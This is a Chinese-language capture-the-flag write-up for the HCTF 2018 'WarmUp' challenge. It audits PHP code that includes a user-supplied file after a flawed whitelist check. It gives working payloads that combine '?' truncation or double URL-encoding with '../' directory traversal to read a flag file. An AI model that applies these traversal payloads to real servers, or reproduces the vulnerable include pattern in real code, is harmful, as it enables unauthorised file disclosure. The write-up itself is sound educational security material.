[HCTF 2018]WarmUp(文件包含，目录穿越)

F12发现hint：

进去看到了源码：

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

代码审计：

  if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  

1. 判断file不为空
2. file是个字符串
3. 通过checkFile方法判断返回的boolean值

移步到checkFile方法：

public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    

1. 定义了一个白名单（whitelist）
2. 判断file是否存在且为字符串
3. 第一个if，判断file是否在白名单中，是即返回true
4. $_page用mb_substr截取从0位置到mb_strpos($page.'?','?')位置，mb_strpos($page.'?','?')这个通过自己环境测试：

<?php

$a = 'aa?';
$b = 'b?';
echo mb_strpos($a.'?','?');
echo "  ".mb_strpos($a,'?');
echo "  ".mb_strpos($b.'?','?');
echo "  ".mb_strpos($b,'?');
?>

得到：

不管mb_strpos($page.'?','?')，里的参数接不接'?'，最后返回的值都是一样的。

5. 截取后判断是否在白名单中，是即返回true
6. 进行一次url解码，再截取?前的字符串，然后判断是否在白名单中

因为flag位置未知，访问一下hint.php看有没有收获：

所以只要checkFile返回true，并满足判断file不为空且file是个字符串，就可以包含file。
返回true的方法有三个，第一个if的话如果不截取是返回不了。而第二个if可以：

payload：source.php?file=hint.php?../../../../../ffffllllaaaagggg

得到flag。
第三个if方法因为解码了一次，所以，我们要对?进行加密。
因为url自身会解码一次，所以如果只加密一次的话，经过url解码，传到php中就还是?，所以进行两次加密，得到：%253F

payload：source.php?file=hint.php%253F../../../../../ffffllllaaaagggg

得到flag。
至于为什么要加这么多个../，我在其他师傅的wp中发现了答案：

如果include的文件名中含有“/”，那么它会识别其为一个带目录的文件，只有最后一个“/”后的字符串对应的文件会被包含，而前面的字符串都只是在指定目录，默认从当前目录开始追溯（也就是source.php所在目录）。那么source.php？其实是一个目录，经过后面几个的…/最终追溯到根目录，ffffllllaaaagggg应该是在根目录。你也许想说目录source.php?这个目录根本不存在，但是经过测试，无论在其后再多加n个不存在的目录（如sjsvsu/,ajwjhzbd/等），只要再加n个…/补平，就能追溯到根目录。

链接：

https://blog.youkuaiyun.com/tch3430493902/article/details/103928125?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-1